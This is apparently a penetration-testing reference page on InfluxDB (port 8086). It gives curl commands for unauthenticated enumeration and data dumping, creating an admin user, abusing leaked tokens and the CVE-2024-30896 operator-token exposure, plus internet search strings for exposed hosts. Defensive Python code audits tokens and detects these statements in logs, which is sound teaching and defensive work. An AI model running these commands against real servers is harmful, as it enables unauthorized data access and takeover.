---
title: "8086 - Influxdb"
weight: 8086
date: "2026-03-10T10:03:28+08:00"
lastmod: "2026-03-10T13:26:55+08:00"
---

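💡 **Study tip**: This document covers penetration-testing methods for **8086 - InfluxDB** and is intended as a reference for information-security beginners and practitioners.

⚠️ **Legal notice**: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.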

---

If you **get an error like** this one: `ERR: unable to parse authentication credentials`, it means that the server is **expecting credentials**.

```bash
influx -username influx -password influx_pass
```

There was a vulnerability in InfluxDB that allowed bypassing authentication: [**CVE-2019-20933**](https://github.com/LorenzoTullini/InfluxDB-利用-CVE-2019-20933)

#### Manual Enumeration (v1 HTTP API / InfluxQL)

Even when no CLI is available, the HTTP API is usually exposed on port 8086.

```bash
## List databases (unauth)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW DATABASES"

## List retention policies of a DB
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW RETENTION POLICIES ON telegraf"

## List users (if auth disabled)
curl -sG "http://<host>:8086/query" --data-urlencode "q=SHOW USERS"

## List measurements (tables)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW MEASUREMENTS"

## List field keys (columns)
curl -sG "http://<host>:8086/query" --data-urlencode "db=telegraf" --data-urlencode "q=SHOW FIELD KEYS"

## Dump data from a measurement
curl -sG "http://<host>:8086/query" \
  --data-urlencode "db=telegraf" \
  --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5' | jq .

## Force epoch timestamps (useful for tooling)
curl -sG "http://<host>:8086/query" \
  --data-urlencode "epoch=ns" \
  --data-urlencode "db=telegraf" \
  --data-urlencode 'q=SELECT * FROM "cpu" LIMIT 5'
```

> [!WARNING]
> In some testing with the authentication bypass it was noted that the name of the table needed to be between double quotes like: `select * from "cpu"`

If authentication is disabled, you can even create users and escalate:

```bash
## Create an admin user (v1, auth disabled)
curl -sG "http://<host>:8086/query" \
  --data-urlencode "q=CREATE USER hacker WITH PASSWORD 'P@ssw0rd!' WITH ALL PRIVILEGES"
```

The following CLI examples are taken from [**here**](https://oznetnerd.com/2017/06/11/getting-know-influxdb/).

#### Show databases

The databases found are `telegraf` and `_internal` (you will find the latter on every instance).

```bash
> show databases
name: databases
name
----
telegraf
_internal
```

#### Show tables/measurements

The [**InfluxDB documentation**](https://docs.influxdata.com/influxdb/v1.2/introduction/getting_started/) explains that **measurements** in InfluxDB are comparable to SQL tables. The name of a **measurement** indicates its content, with each one holding data about a particular entity.

```bash
> show measurements
name: measurements
name
----
cpu
disk
diskio
kernel
mem
processes
swap
system
```

#### Show columns/field keys

The field keys are like the **columns** of the database.

```bash
> show field keys
name: cpu
fieldKey         fieldType
--------         ---------
usage_guest      float
usage_guest_nice float
usage_idle       float
usage_iowait     float

name: disk
fieldKey     fieldType
--------     ---------
free         integer
inodes_free  integer
inodes_total integer
inodes_used  integer

[ ... more keys ...]
```

#### Dump Table

Finally, you can **dump the table** with a query such as:

```bash
> select * from cpu
name: cpu
time                cpu       host   usage_guest usage_guest_nice usage_idle        usage_iowait        usage_irq usage_nice usage_softirq        usage_steal usage_system        usage_user
----                ---       ----   ----------- ---------------- ----------        ------------        --------- ---------- -------------        ----------- ------------        ----------
1497018760000000000 cpu-total ubuntu 0           0                99.297893681046   0                   0         0          0                    0           0.35105315947842414 0.35105315947842414
1497018760000000000 cpu1      ubuntu 0           0                99.69909729188728 0                   0         0          0                    0           0.20060180541622202 0.10030090270811101
```

#### InfluxDB v2.x API (Token-based)

InfluxDB 2.x introduces token-based auth and a new API (still on 8086 by default). If you obtain a token (leaked logs, default deployments, backups) you can enumerate:

```bash
## Basic org, bucket, and auth discovery
TOKEN="<token>"
## Keep the header in an array so it reaches curl as one argument (no word splitting)
H=(-H "Authorization: Token $TOKEN")

## Health & version
curl -s "http://<host>:8086/health" | jq .

## List organizations
curl -s "${H[@]}" "http://<host>:8086/api/v2/organizations" | jq .

## List buckets
curl -s "${H[@]}" 'http://<host>:8086/api/v2/buckets?limit=100' | jq .

## List authorizations (requires perms)
ORGID="<org_id>"
curl -s "${H[@]}" "http://<host>:8086/api/v2/authorizations?orgID=$ORGID" | jq .

## Query data with Flux (v2 expects org or orgID on this endpoint)
curl -s "${H[@]}" -H 'Accept: application/csv' -H 'Content-Type: application/vnd.flux' \
  -X POST "http://<host>:8086/api/v2/query?orgID=$ORGID" \
  --data 'from(bucket:"telegraf") |> range(start:-1h) |> limit(n:5)'
```

Notes
- For v1.8+, some v2-compatible endpoints exist (`/api/v2/query`, `/api/v2/write`, `/health`). This is useful if the server is v1 but accepts v2-style requests.
- In v2, the HTTP `Authorization` header must be in the form `Token <value>`.
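
Seen from the defender's side, the authorizations listing above shows which tokens meet the precondition this page gives for CVE-2024-30896 (read access to authorizations in the default org). This is an added example, not part of the original page or InfluxData's code; the JSON field names are the assumed shape of the v2 authorizations response, the operator test is a heuristic, and the sample listing and ids are constructed.

```python
import json

def review_authorizations(listing_json, default_org_id):
    """Sort active authorizations from GET /api/v2/authorizations into review buckets."""
    operator_like, token_readers = [], []
    for auth in json.loads(listing_json).get("authorizations", []):
        if auth.get("status") != "active":
            continue
        perms = auth.get("permissions", [])
        # Heuristic (assumption): operator permissions carry no orgID scope at all.
        if perms and not any(p["resource"].get("orgID") for p in perms):
            operator_like.append(auth["id"])
        # Org-scoped token in the default org that may read other authorizations.
        elif auth.get("orgID") == default_org_id and any(
            p["action"] == "read" and p["resource"]["type"] == "authorizations"
            for p in perms
        ):
            token_readers.append(auth["id"])
    return {"operator_like": operator_like, "default_org_token_readers": token_readers}

# Constructed listing; ids are placeholders and "token" values are left out on purpose.
SAMPLE_LISTING = json.dumps({"authorizations": [
    {"id": "auth-operator", "status": "active", "orgID": "org-default", "permissions": [
        {"action": "read", "resource": {"type": "authorizations"}},
        {"action": "write", "resource": {"type": "orgs"}}]},
    {"id": "auth-all-access", "status": "active", "orgID": "org-default", "permissions": [
        {"action": "read", "resource": {"type": "authorizations", "orgID": "org-default"}},
        {"action": "read", "resource": {"type": "buckets", "orgID": "org-default"}}]},
    {"id": "auth-bucket-ro", "status": "active", "orgID": "org-default", "permissions": [
        {"action": "read", "resource": {"type": "buckets", "id": "bkt-1", "orgID": "org-default"}}]},
    {"id": "auth-other-org", "status": "active", "orgID": "org-team-b", "permissions": [
        {"action": "read", "resource": {"type": "authorizations", "orgID": "org-team-b"}}]},
    {"id": "auth-disabled", "status": "inactive", "orgID": "org-default", "permissions": [
        {"action": "read", "resource": {"type": "authorizations", "orgID": "org-default"}}]},
]})

if __name__ == "__main__":
    print(review_authorizations(SAMPLE_LISTING, "org-default"))
```

Tokens reported under `default_org_token_readers` are the ones to move out of the default org or re-issue with narrower permissions.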

#### Automated Enumeration

```bash
msf6 > use auxiliary/scanner/http/influxdb_enum
```

#### Recent vulnerabilities and privilege escalation of interest (last few years)

- InfluxDB OSS 2.x through 2.7.11 operator token exposure (CVE-2024-30896). Under specific conditions, an authenticated user with read access to the authorization resource in the default organization could list and retrieve the instance-wide operator token (e.g., via `influx auth ls` or `GET /api/v2/authorizations`). With that token, the attacker can administer the instance (buckets, tokens, users) and access all data across orgs. Upgrade to a fixed build when available and avoid placing regular users in the default org. Quick test:

```bash
## Using a low-priv/all-access token tied to the default org
curl -s -H 'Authorization: Token <user_or_allAccess_token>' \
  'http://<host>:8086/api/v2/authorizations?orgID=<default_org_id>' | jq .
## Look for entries of type "operator" and extract the raw token (if present)
```

- Many legacy 1.x deployments still expose `/query` and `/write` unauthenticated on the Internet. If auth is disabled, you can dump or even modify time-series at will; you may also create admin users as shown above. Always verify with the HTTP API even if the CLI blocks you.
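
The defender's view of the unauthenticated `/query` access described above: a small detector that flags this page's InfluxQL statements in InfluxDB 1.x HTTP access-log lines and marks the ones answered without credentials. This is an added example, not part of the original page; the `[httpd]` log layout is an assumption and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed layout of an InfluxDB 1.x access-log line (Common Log Format after "[httpd]").
LINE = re.compile(
    r'\[httpd\] (?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"[A-Z]+ (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
# InfluxQL statements used on this page, most serious first.
RULES = [
    ("privilege-change", re.compile(r"\b(CREATE\s+USER|GRANT\s+ALL)\b", re.I)),
    ("user-enumeration", re.compile(r"\bSHOW\s+USERS\b", re.I)),
    ("schema-enumeration", re.compile(
        r"\bSHOW\s+(DATABASES|MEASUREMENTS|FIELD\s+KEYS|RETENTION\s+POLICIES)\b", re.I)),
]

def classify(line):
    """Return (ip, rule, unauthenticated_success) for a flagged /query line, else None."""
    m = LINE.search(line)
    if not m:
        return None
    url = urlsplit(m["uri"])
    if url.path != "/query":
        return None
    # parse_qs undoes the URL encoding; statements sent in a POST body are not logged here.
    statement = " ".join(parse_qs(url.query).get("q", []))
    for rule, pattern in RULES:
        if pattern.search(statement):
            # No user name plus HTTP 200: the server answered without credentials.
            return m["ip"], rule, m["user"] == "-" and m["status"] == "200"
    return None

def open_access_sources(lines):
    """Client IPs that ran a flagged statement successfully without authenticating."""
    return sorted({r[0] for r in map(classify, lines) if r and r[2]})

SAMPLE_LOG = [  # constructed lines for illustration, not taken from a real server
    '[httpd] 203.0.113.7 - - [10/Mar/2026:02:03:28 +0000] "GET /query?q=SHOW+DATABASES HTTP/1.1" 200 120 "-" "curl/8.5.0" req-1 412',
    '[httpd] 203.0.113.7 - - [10/Mar/2026:02:03:31 +0000] "GET /query?q=SHOW+USERS HTTP/1.1" 200 98 "-" "curl/8.5.0" req-2 388',
    '[httpd] 203.0.113.7 - - [10/Mar/2026:02:03:40 +0000] "GET /query?q=CREATE+USER+x+WITH+PASSWORD+%5BREDACTED%5D+WITH+ALL+PRIVILEGES HTTP/1.1" 200 57 "-" "curl/8.5.0" req-3 950',
    '[httpd] 198.51.100.20 - grafana [10/Mar/2026:02:04:02 +0000] "GET /query?db=telegraf&q=SHOW+MEASUREMENTS HTTP/1.1" 200 310 "-" "Grafana" req-4 501',
    '[httpd] 198.51.100.9 - - [10/Mar/2026:02:04:10 +0000] "GET /query?q=SHOW+USERS HTTP/1.1" 401 55 "-" "curl/8.5.0" req-5 90',
    '[httpd] 198.51.100.20 - telegraf [10/Mar/2026:02:04:11 +0000] "POST /write?db=telegraf HTTP/1.1" 204 0 "-" "Telegraf" req-6 700',
]

if __name__ == "__main__":
    print([classify(entry) for entry in SAMPLE_LOG], open_access_sources(SAMPLE_LOG))
```

Any address returned by `open_access_sources` means the instance served user or schema statements with authentication off, which is the condition to fix first.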

---


### Search Engine Syntax

#### FOFA

```bash
# FOFA search syntax
port="8086"
```

#### Shodan

```bash
# Shodan search syntax
port:8086
```

#### ZoomEye

```bash
# ZoomEye search syntax
port:8086
```

---

## 📖 References

- [HackTricks - 8086-influxdb](https://book.hacktricks.wiki/en/network-services-pentesting/8086-influxdb.html)

